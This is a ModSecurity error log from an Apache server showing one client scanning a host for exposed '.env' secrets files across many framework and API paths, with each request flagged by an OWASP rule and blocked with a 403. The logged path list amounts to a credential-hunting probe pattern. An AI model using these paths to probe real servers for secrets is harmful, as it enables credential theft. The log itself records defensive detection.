[Mon May 11 17:22:49.725416 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZwAAAQs"]
[Mon May 11 17:22:49.725921 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZwAAAQs"]
[Mon May 11 17:22:49.726149 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/prestashop/.env"] [unique_id "agH0SUWKUxpmnkK7zHySZwAAAQs"]
[Mon May 11 17:22:49.888373 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agH0SUWKUxpmnkK7zHySaAAAAQs"]
[Mon May 11 17:22:49.888851 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agH0SUWKUxpmnkK7zHySaAAAAQs"]
[Mon May 11 17:22:49.889074 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/codeigniter/.env"] [unique_id "agH0SUWKUxpmnkK7zHySaAAAAQs"]
[Mon May 11 17:22:50.052240 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agH0SkWKUxpmnkK7zHySaQAAAQs"]
[Mon May 11 17:22:50.052706 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agH0SkWKUxpmnkK7zHySaQAAAQs"]
[Mon May 11 17:22:50.052939 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/cakephp/.env"] [unique_id "agH0SkWKUxpmnkK7zHySaQAAAQs"]
[Mon May 11 17:22:50.214527 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agH0SkWKUxpmnkK7zHySawAAAQs"]
[Mon May 11 17:22:50.214990 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agH0SkWKUxpmnkK7zHySawAAAQs"]
[Mon May 11 17:22:50.215249 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/zend/.env"] [unique_id "agH0SkWKUxpmnkK7zHySawAAAQs"]
[Mon May 11 17:22:50.376797 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbAAAAQs"]
[Mon May 11 17:22:50.377321 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbAAAAQs"]
[Mon May 11 17:22:50.377553 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/yii/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbAAAAQs"]
[Mon May 11 17:22:50.538836 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbQAAAQs"]
[Mon May 11 17:22:50.539349 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbQAAAQs"]
[Mon May 11 17:22:50.539574 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/laravel5/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbQAAAQs"]
[Mon May 11 17:22:50.707749 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbgAAAQs"]
[Mon May 11 17:22:50.708251 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbgAAAQs"]
[Mon May 11 17:22:50.708508 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/v1/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbgAAAQs"]
[Mon May 11 17:22:50.871640 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbwAAAQs"]
[Mon May 11 17:22:50.872119 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbwAAAQs"]
[Mon May 11 17:22:50.872368 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/v2/.env"] [unique_id "agH0SkWKUxpmnkK7zHySbwAAAQs"]
[Mon May 11 17:22:51.033399 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v3/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScQAAAQs"]
[Mon May 11 17:22:51.033866 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScQAAAQs"]
[Mon May 11 17:22:51.034098 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/v3/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScQAAAQs"]
[Mon May 11 17:22:51.196299 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScgAAAQs"]
[Mon May 11 17:22:51.196779 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScgAAAQs"]
[Mon May 11 17:22:51.197004 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v1/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScgAAAQs"]
[Mon May 11 17:22:51.358404 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScwAAAQs"]
[Mon May 11 17:22:51.358900 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScwAAAQs"]
[Mon May 11 17:22:51.359145 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/api/v2/.env"] [unique_id "agH0S0WKUxpmnkK7zHyScwAAAQs"]
[Mon May 11 17:22:51.520626 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /rest/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdAAAAQs"]
[Mon May 11 17:22:51.521115 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdAAAAQs"]
[Mon May 11 17:22:51.521381 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/rest/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdAAAAQs"]
[Mon May 11 17:22:51.682747 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /graphql/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdQAAAQs"]
[Mon May 11 17:22:51.683252 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdQAAAQs"]
[Mon May 11 17:22:51.683500 2026] [security2:error] [pid 1411055:tid 1411068] [client 54.241.173.61:55754] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.conge.tct-telecom.fr"] [uri "/graphql/.env"] [unique_id "agH0S0WKUxpmnkK7zHySdQAAAQs"]
